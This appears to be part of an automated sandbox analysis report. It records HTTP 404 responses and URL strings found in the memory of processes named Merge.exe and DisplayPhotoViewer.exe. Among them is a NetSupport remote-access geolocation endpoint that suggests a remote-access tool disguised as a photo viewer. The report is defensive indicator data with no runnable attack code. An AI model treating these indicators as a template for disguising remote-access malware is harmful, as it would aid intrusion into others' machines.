                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 15 Dec 2024 10:52:13 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f25e208daec7288-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNXmWPG%2F6Dq5R%2F4ZEoMaF9oLjqPXm34rnDVZguNM7OluRroJZuAWpiOjgDwTo%2B4Vw6jzV6Xb2inH2L2UrorDzo6J4lQWh2YTEuedgUN%2F6yJxmD79lvIWgIra4bITDqLcGuygIZSbphlZ%2BkIP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1776&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 15 Dec 2024 10:52:15 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f25e211eecc4249-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ALUFSQNFoukbYkXXIt%2BhnFA8OqZk2wY7eNhm8fxtS4SCnTzDHmaGGJEsJejuPd4vvZHWfm4DfFjgniJuEnObPMNt8u8LLBIJPlKB5lEVXz8QoDCHQMzna3lXhZHO4JBKqxSnVB0KMcZgWt%2FT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 15 Dec 2024 10:52:16 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f25e21ab89c4338-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jfYwYM9bxyLZTHQnZA2iLjiXKPbdYJRQgd0fczWeQrQSQ8pNzzvTM0BSEPWP317mfIOQaCJv1OHZAmuj2ceaUiII%2B3ZCffGWpqH5d1pmvrkbb6MbyfXeeNAfigEYYKeIxnbP9M63rjEnrMmR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                Source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/testpage.htm
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B1C4000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://.css
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B1C4000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://.jpg
                                Source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://127.0.0.1
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://7-zip.org
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://MediaArea.net/MediaInfo
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2601442890.0000000007A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://MediaArea.net/MediaInfox
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://alexzambelli.com/blog/2009/02/10/smooth-streaming-architecture/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://alexzambelli.com/blog/2009/02/10/smooth-streaming-architecture/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://amamaman.hp.infoseek.co.jp/english/amv2_e.html;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://amamaman.hp.infoseek.co.jp/english/amv2_e.html;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aomedia.org/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://base.fims.tv
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://baseTime.fims.tv
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://bellard.org/bpg/
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://description.fims.tv
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://developers.videolan.org/x264.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://diracvideo.org/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://diracvideo.org/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://dividix.host.sk
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://dividix.host.sk;.net
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eMajix.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eMajix.com;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eprints.ecs.soton.ac.uk/archive/00001310/01/VTC97-js.pdf
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eprints.ecs.soton.ac.uk/archive/00001310/01/VTC97-js.pdf;;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://etree.org/shnutils/shorten/;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ffdshow-tryout.sourceforge.net/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ffdshow-tryout.sourceforge.net/;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ffdshow-tryout.sourceforge.net/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ffdshow-tryout.sourceforge.net/;;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ffdshow-tryout.sourceforge.net/;;;RGBA
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ffdshow-tryout.sourceforge.net/;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ffdshow.sourceforge.net/tikiwiki/tiki-index.php?page=Getting
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://freeimage.sourceforge.net
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3142293852.00000000105AB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://freeimage.sourceforge.netD
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ftp.pub.cri74.org/pub/win9x/video/codecs/VP6/vp6_vfw_codec.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ftp.pub.cri74.org/pub/win9x/video/codecs/VP6/vp6_vfw_codec.exe;Advanced;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ftp.pub.cri74.org/pub/win9x/video/codecs/VP6/vp6_vfw_codec.exe;Alpha;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ftp.pub.cri74.org/pub/win9x/video/codecs/VP6/vp6_vfw_codec.exe;Heightened
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ftp.pub.cri74.org/pub/win9x/video/codecs/VP6/vp6_vfw_codec.exe;Simple;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp(
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A63B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp=
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspX
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3113621505.0000000007A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asphoto
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3125781981.000000000B230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.comlocation/loca.asp
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://gpac.sourceforge.net/;JPEG
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B1C4000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://html4/loose.dtd
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaarea.net/DIVX;;;YUV;4:2:0
